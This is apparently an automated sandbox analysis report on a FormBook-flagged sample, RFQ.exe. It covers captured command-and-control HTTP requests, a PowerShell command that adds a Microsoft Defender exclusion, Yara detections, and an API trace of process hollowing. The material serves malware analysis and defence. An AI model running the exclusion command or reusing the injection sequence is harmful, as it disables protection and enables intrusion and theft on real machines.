                                                                                                      Apr 16, 2024 12:03:30.114063978 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:30 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      57192.168.2.54977691.195.240.11780
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:32.635921001 CEST456OUTGET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:32.848392010 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:03:32 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:11:58:53
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0x810000
                                                                                                      File size:820'224 bytes
                                                                                                      MD5 hash:4D82CC1B35B8DC9EC7D149F1B8B95E95
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0x520000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:11:58:54
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:820'224 bytes
                                                                                                      MD5 hash:4D82CC1B35B8DC9EC7D149F1B8B95E95
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:11:58:56
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff6ef0c0000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:11:59:03
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:11:59:04
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\icacls.exe"
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:11:59:17
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:11:59:29
                                                                                                      Start date:16/04/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff79f9e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.8%
                                                                                                        Dynamic/Decrypted Code Coverage:98.1%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:156
                                                                                                        Total number of Limit Nodes:5
                                                                                                        execution_graph 61753 edd01c 61754 edd034 61753->61754 61755 edd08e 61754->61755 61759 51806a4 CallWindowProcW 61754->61759 61760 5182858 61754->61760 61764 51835c8 61754->61764 61768 5182868 61754->61768 61759->61755 61761 5182868 61760->61761 61762 51806a4 CallWindowProcW 61761->61762 61763 51828af 61762->61763 61763->61755 61765 51835d8 61764->61765 61767 5183629 61765->61767 61772 51807cc CallWindowProcW 61765->61772 61769 518288e 61768->61769 61770 51806a4 CallWindowProcW 61769->61770 61771 51828af 61770->61771 61771->61755 61772->61767 61569 122de20 DuplicateHandle 61570 122deb6 61569->61570 61571 122b730 61574 122b818 61571->61574 61572 122b73f 61575 122b839 61574->61575 61576 122b85c 61574->61576 61575->61576 61581 122bec0 61575->61581 61576->61572 61577 122b854 61577->61576 61578 122ba60 GetModuleHandleW 61577->61578 61579 122ba8d 61578->61579 61579->61572 61582 122bed4 61581->61582 61584 122bef9 61582->61584 61585 122ac18 61582->61585 61584->61577 61586 122c0a0 LoadLibraryExW 61585->61586 61588 122c119 61586->61588 61588->61584 61725 77bc398 61726 77bc523 61725->61726 61727 77bc3be 61725->61727 61727->61726 61729 77b6514 61727->61729 61730 77bc618 PostMessageW 61729->61730 61731 77bc684 61730->61731 61731->61727 61589 51826b0 61590 5182718 CreateWindowExW 61589->61590 61592 51827d4 61590->61592 61593 5184c51 61594 5184c80 61593->61594 61595 5184d6c 61594->61595 61596 5184cc2 61594->61596 61600 51806a4 61595->61600 61598 5184d1a CallWindowProcW 61596->61598 61599 5184cc9 61596->61599 61598->61599 61601 51806af 61600->61601 61603 5183629 61601->61603 61604 51807cc CallWindowProcW 61601->61604 61604->61603 61732 1224bc8 61733 1224bd1 61732->61733 61734 1224bd7 61733->61734 61736 1224cc0 61733->61736 61737 1224ce5 61736->61737 61741 1224dc0 61737->61741 61745 1224dd0 61737->61745 61743 1224df7 61741->61743 61742 1224ed4 61742->61742 61743->61742 61749 1224948 61743->61749 61747 1224df7 61745->61747 61746 1224ed4 61746->61746 61747->61746 61748 1224948 CreateActCtxA 61747->61748 61748->61746 61750 1225e60 CreateActCtxA 61749->61750 61752 1225f23 61750->61752 61773 122dbd8 61774 122dc1e GetCurrentProcess 61773->61774 61776 122dc70 GetCurrentThread 61774->61776 61777 122dc69 61774->61777 61778 122dca6 61776->61778 61779 122dcad GetCurrentProcess 61776->61779 61777->61776 61778->61779 61780 122dce3 GetCurrentThreadId 61779->61780 61782 122dd3c 61780->61782 61605 77b8ba7 61606 77b8bb4 61605->61606 61610 77bb1b0 61606->61610 61614 77bb1a0 61606->61614 61607 77b8bbf 61611 77bb1ca 61610->61611 61618 77bb4c8 61611->61618 61615 77bb1ca 61614->61615 61617 77bb4c8 12 API calls 61615->61617 61616 77bb1ee 61616->61607 61617->61616 61619 77bb4ed 61618->61619 61631 77bbd28 61619->61631 61636 77bb7f5 61619->61636 61640 77bbf15 61619->61640 61644 77bb6a7 61619->61644 61648 77bb72c 61619->61648 61652 77bba8c 61619->61652 61658 77bbc8d 61619->61658 61662 77bb7cd 61619->61662 61668 77bb5ee 61619->61668 61673 77bb938 61619->61673 61620 77bb1ee 61620->61607 61632 77bba41 61631->61632 61677 77b7668 61632->61677 61681 77b7661 61632->61681 61633 77bb9f4 61633->61620 61685 77b7b48 61636->61685 61689 77b7b50 61636->61689 61637 77bb80f 61637->61620 61642 77b7b48 Wow64SetThreadContext 61640->61642 61643 77b7b50 Wow64SetThreadContext 61640->61643 61641 77bbf2f 61642->61641 61643->61641 61693 77b83a8 61644->61693 61697 77b839e 61644->61697 61701 77b8208 61648->61701 61705 77b8210 61648->61705 61649 77bb70a 61653 77bba92 61652->61653 61709 77b8118 61653->61709 61713 77b8120 61653->61713 61717 77b8058 61653->61717 61721 77b8060 61653->61721 61660 77b8118 WriteProcessMemory 61658->61660 61661 77b8120 WriteProcessMemory 61658->61661 61659 77bbcb1 61659->61620 61660->61659 61661->61659 61663 77bb735 61662->61663 61664 77b8058 VirtualAllocEx 61663->61664 61665 77b8060 VirtualAllocEx 61663->61665 61666 77b8118 WriteProcessMemory 61663->61666 61667 77b8120 WriteProcessMemory 61663->61667 61664->61663 61665->61663 61666->61663 61667->61663 61669 77bb641 61668->61669 61670 77bb6e2 61669->61670 61671 77b83a8 CreateProcessA 61669->61671 61672 77b839e CreateProcessA 61669->61672 61670->61620 61670->61670 61671->61670 61672->61670 61675 77b8118 WriteProcessMemory 61673->61675 61676 77b8120 WriteProcessMemory 61673->61676 61674 77bb966 61675->61674 61676->61674 61678 77b76a8 ResumeThread 61677->61678 61680 77b76d9 61678->61680 61680->61633 61682 77b76a8 ResumeThread 61681->61682 61684 77b76d9 61682->61684 61684->61633 61686 77b7b95 Wow64SetThreadContext 61685->61686 61688 77b7bdd 61686->61688 61688->61637 61690 77b7b95 Wow64SetThreadContext 61689->61690 61692 77b7bdd 61690->61692 61692->61637 61694 77b8431 61693->61694 61694->61694 61695 77b8596 CreateProcessA 61694->61695 61696 77b85f3 61695->61696 61698 77b8431 CreateProcessA 61697->61698 61700 77b85f3 61698->61700 61702 77b825b ReadProcessMemory 61701->61702 61704 77b829f 61702->61704 61704->61649 61706 77b825b ReadProcessMemory 61705->61706 61708 77b829f 61706->61708 61708->61649 61710 77b8168 WriteProcessMemory 61709->61710 61712 77b81bf 61710->61712 61712->61653 61714 77b8168 WriteProcessMemory 61713->61714 61716 77b81bf 61714->61716 61716->61653 61718 77b80a0 VirtualAllocEx 61717->61718 61720 77b80dd 61718->61720 61720->61653 61722 77b80a0 VirtualAllocEx 61721->61722 61724 77b80dd 61722->61724 61724->61653

                                                                                                        Executed Functions

                                                                                                        Function 08F2C7F3 Relevance: 9.5, Strings: 7, Instructions: 799COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 506 8f2c7f3 507 8f2c887-8f2c8b2 call 8f21858 506->507 508 8f2c7f9-8f2c800 506->508 528 8f2c8b9-8f2c91a call 8f21858 507->528 509 8f2c802-8f2c80f 508->509 510 8f2c81a-8f2c823 508->510 509->510 511 8f2c825-8f2c827 510->511 512 8f2c829-8f2c82c 510->512 515 8f2c82d-8f2c831 511->515 512->515 738 8f2c833 call 8f2c7f3 515->738 739 8f2c833 call 8f2ac00 515->739 740 8f2c833 call 8f2c530 515->740 741 8f2c833 call 8f2a984 515->741 742 8f2c833 call 8f2c72c 515->742 518 8f2c839-8f2c83e 520 8f2c840-8f2c847 518->520 521 8f2c881-8f2c884 518->521 522 8f2c861-8f2c876 520->522 523 8f2c849-8f2c856 520->523 522->521 527 8f2c878-8f2c87f 522->527 523->522 527->521 527->528 536 8f2c932-8f2c938 528->536 537 8f2c91c-8f2c92f 528->537 538 8f2c93a-8f2c941 536->538 539 8f2c9a8-8f2ca00 536->539 541 8f2ca07-8f2ca5f 538->541 542 8f2c947-8f2c957 538->542 539->541 546 8f2ca66-8f2ca7c 541->546 542->546 547 8f2c95d-8f2c961 542->547 557 8f2ca7f-8f2cad2 546->557 550 8f2c964-8f2c966 547->550 553 8f2c98b-8f2c98d 550->553 554 8f2c968-8f2c978 550->554 555 8f2c98f-8f2c999 553->555 556 8f2c99c-8f2c9a5 553->556 561 8f2c963 554->561 562 8f2c97a-8f2c989 554->562 580 8f2cad3-8f2cad8 557->580 561->550 562->553 562->561 580->557 582 8f2cada-8f2cb48 580->582 592 8f2cbc3 582->592 593 8f2cb4a-8f2cb51 582->593 593->580 594 8f2cb53-8f2cb74 593->594 595 8f2cbc6-8f2cc1e 594->595 596 8f2cb76-8f2cb86 594->596 599 8f2cc25-8f2cc89 595->599 596->599 600 8f2cb8c-8f2cb90 596->600 623 8f2cc8b-8f2cd09 599->623 602 8f2cb93-8f2cb95 600->602 604 8f2cb97-8f2cba7 602->604 605 8f2cba9-8f2cbab 602->605 604->605 612 8f2cb92 604->612 607 8f2cbba-8f2cbc2 605->607 608 8f2cbad-8f2cbb7 605->608 607->592 612->602 635 8f2cd0b-8f2cd32 623->635 636 8f2cd34-8f2cd37 635->636 637 8f2cd4a-8f2cd50 635->637 642 8f2cd40-8f2cd47 636->642 638 8f2cd52-8f2cd59 637->638 639 8f2cdca-8f2ce22 637->639 640 8f2ce29-8f2ce81 638->640 641 8f2cd5f-8f2cd63 638->641 639->640 643 8f2ce88-8f2cee1 640->643 641->643 644 8f2cd69-8f2cd6d 641->644 678 8f2cee3 643->678 646 8f2cd70-8f2cd7d 644->646 653 8f2cda2-8f2cdaf 646->653 654 8f2cd7f-8f2cd8f 646->654 661 8f2cdb1-8f2cdbb 653->661 662 8f2cdbe-8f2cdc7 653->662 663 8f2cd91-8f2cda0 654->663 664 8f2cd6f 654->664 663->653 663->664 664->646 679 8f2ceeb-8f2cf61 678->679 679->678 690 8f2cf63-8f2cf69 679->690 690->679 691 8f2cf6b-8f2cf8c 690->691 692 8f2cfe8-8f2d040 691->692 693 8f2cf8e-8f2cf92 691->693 694 8f2d047-8f2d0a0 692->694 693->694 695 8f2cf98-8f2cf9c 693->695 720 8f2d0ab-8f2d129 694->720 697 8f2cf9f-8f2cfac 695->697 701 8f2cfc0-8f2cfcd 697->701 702 8f2cfae-8f2cfbe 697->702 710 8f2cfcf-8f2cfd9 701->710 711 8f2cfdc-8f2cfe5 701->711 702->701 709 8f2cf9e 702->709 709->697 731 8f2d12b-8f2d140 720->731 734 8f2d142-8f2d148 731->734 735 8f2d158-8f2d159 731->735 736 8f2d14a 734->736 737 8f2d14c-8f2d14e 734->737 736->735 737->735 738->518 739->518 740->518 741->518 742->518
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2018253889.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_8f20000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Haq$Haq$Haq$Haq$Haq$Haq$i
                                                                                                        • API String ID: 0-3630233658
                                                                                                        • Opcode ID: c95bd13aa8c7a479f91a2bb32d9fa9a010c1b0292774e77f2326b7abe039bd16
                                                                                                        • Instruction ID: 5a1362afae532b95eddc6bb3f6b968dae24fdec9e225a4b2c3df3daf4a856369
                                                                                                        • Opcode Fuzzy Hash: c95bd13aa8c7a479f91a2bb32d9fa9a010c1b0292774e77f2326b7abe039bd16
                                                                                                        • Instruction Fuzzy Hash: 6542BF71B002148FCB48AB7998A476E7BAAFFD4310B248969D50ADB3E5DE34DD03C791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072E0970 Relevance: .9, Instructions: 927COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a5c43e59213d12c267998124268d115590d8d1e04d717be8f76b2c7c902509e4
                                                                                                        • Instruction ID: fa7105616f6e7786b50fb988805e7fdf056c03585490ac1aa0d9479db318ce87
                                                                                                        • Opcode Fuzzy Hash: a5c43e59213d12c267998124268d115590d8d1e04d717be8f76b2c7c902509e4
                                                                                                        • Instruction Fuzzy Hash: 72A22871E102198FCB55DF68C8586EDB7B2FF89300F1482A9D90AA7351EB74AE91CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 08F24638 Relevance: .7, Instructions: 668COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2018253889.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_8f20000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32d86a7f67c4c639da71f29846f8d8523f44a825b74e3cfdc86144c28b577ea4
                                                                                                        • Instruction ID: d83eb62a963eafccdf4c1eb5dde9edad0425665e47c45b4f705aa94cc2d82d4f
                                                                                                        • Opcode Fuzzy Hash: 32d86a7f67c4c639da71f29846f8d8523f44a825b74e3cfdc86144c28b577ea4
                                                                                                        • Instruction Fuzzy Hash: 3A521470A00624CFCB14DF68C588AADB7F2FF98315F2585A8E40A9B365DB75EC46CB44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 012278C0 Relevance: .1, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e3d5af192b0dd5ae63110222bc33d60bf978788dab0523f186d64a77e1042907
                                                                                                        • Instruction ID: 2b60f3cb4babfa39145f688bff956ba439595d0d6e3a82eabc9aeb0734f045f2
                                                                                                        • Opcode Fuzzy Hash: e3d5af192b0dd5ae63110222bc33d60bf978788dab0523f186d64a77e1042907
                                                                                                        • Instruction Fuzzy Hash: 3F316F30A097609FD329EB3488526FE77A3EFEA325F84886DC0561F264CE769442D741
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01223AC0 Relevance: .1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 664b149e2571b3c75bbe75ef97038d088e8d3ec6cf0848b6dbf7fe331d6eaed8
                                                                                                        • Instruction ID: 0c66eab7851bcc830a4af5c5a1dbdc40b0bc7fab349fae3781828f7984aa81ca
                                                                                                        • Opcode Fuzzy Hash: 664b149e2571b3c75bbe75ef97038d088e8d3ec6cf0848b6dbf7fe331d6eaed8
                                                                                                        • Instruction Fuzzy Hash: 7221D830A15721DBD32DEB3188525BE73A7EFEA315B94CC7CC05A1B264CE76A442EB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 074046A3 Relevance: 17.8, Strings: 14, Instructions: 253COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
